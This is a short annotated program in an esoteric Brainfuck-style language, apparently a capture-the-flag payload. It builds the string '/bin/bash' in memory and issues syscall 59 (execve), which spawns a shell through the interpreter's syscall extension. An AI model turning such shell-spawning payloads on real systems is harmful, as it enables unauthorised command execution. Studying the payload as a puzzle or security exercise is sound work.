goto 64
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
store '/bin/bash'
/
>++++++++[<++++++>-]<-
b
>>++++++++++[<++++++++++>-]<--
i
>>+++++++++++[<++++++++++>-]<-----
n
>>++++++++++[<+++++++++++>-]<
/
>>++++++++[<++++++>-]<-
b
>>++++++++++[<++++++++++>-]<--
a
>>++++++++++[<++++++++++>-]<---
s
>>+++++++++++[<++++++++++>-]<+++++
h
>>++++++++++[<++++++++++>-]<++++
goto 8
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
store 64 and dereference
>+++++++[<++++++++++>-]<------@
goto 0
<<<<<<<<
store 59
>++++++[<++++++++++>-]<-
$